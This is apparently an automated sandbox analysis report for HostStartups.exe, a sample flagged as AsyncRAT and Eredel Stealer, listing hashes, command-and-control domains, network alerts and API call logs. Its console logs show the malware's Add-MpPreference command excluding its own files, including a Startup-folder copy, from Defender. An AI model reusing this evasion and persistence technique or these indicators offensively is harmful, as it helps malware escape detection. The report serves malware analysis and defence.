popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

HostStartups.exe

Eredel Stealer Extended AsyncRAT AgentTesla info stealer browser email stealer Google Chrome User Data Antivirus Socket ScreenShot KeyLogger DNS AntiDebug PE32 PE File .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 June 21, 2021, 8:25 p.m. June 21, 2021, 8:27 p.m.
Size 33.8KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 6640bb72348963f486a0e0fb7a221587
SHA256 e8db1a4da9b1f907b663edd07b65c9d2bf767bc4901258a01347d3e3d268e07e
CRC32 DFD64045
ssdeep 768:wsjHfELkxt2Sd6mBPgNlXeQOR67scvnYnonXh6:wMsLkxtDLB4TZvxvYo8
Yara
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)
  • Win_Eredel_Stealer_Extended_IN_Zero - Win Eredel Stealer Extended

Name Response Post-Analysis Lookup
apdocroto.gq
A 172.67.158.27
A 104.21.14.60
172.67.158.27
dontreachme3.ddns.net
A 95.90.186.169
95.90.186.169
IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
172.67.158.27 Active Moloch
95.90.186.169 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.102:57660 -> 164.124.101.2:53 2025104 ET INFO DNS Query for Suspicious .gq Domain Potentially Bad Traffic
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
UDP 192.168.56.102:50839 -> 164.124.101.2:53 2028675 ET POLICY DNS Query to DynDNS Domain *.ddns .net Potentially Bad Traffic
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\Host
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: Startups.exe -Force
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\Host
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: Startups.exe -Force
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\Microso
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: ft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: xe -Force
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\Microso
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: ft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: xe -Force
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\Host
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: Startups.exe -Force
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00521570
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005215f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005215f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005935c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005935c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005935c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005931c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593b80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593f00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00593e40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0034a580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x6a813e
0x6a7639
0x6a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x6a0234
0x6a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 7b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6a81ab
registers.esp: 3989156
registers.edi: 3989176
registers.eax: 0
registers.ebp: 3989188
registers.edx: 37687848
registers.ebx: 3989488
registers.esi: 37687848
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x6a8150
0x6a7639
0x6a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x6a0234
0x6a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 7b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6a81ab
registers.esp: 3989156
registers.edi: 3989176
registers.eax: 0
registers.ebp: 3989188
registers.edx: 52825440
registers.ebx: 3989488
registers.esi: 52825440
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1
mscorlib+0x2f45b0 @ 0x6eed45b0
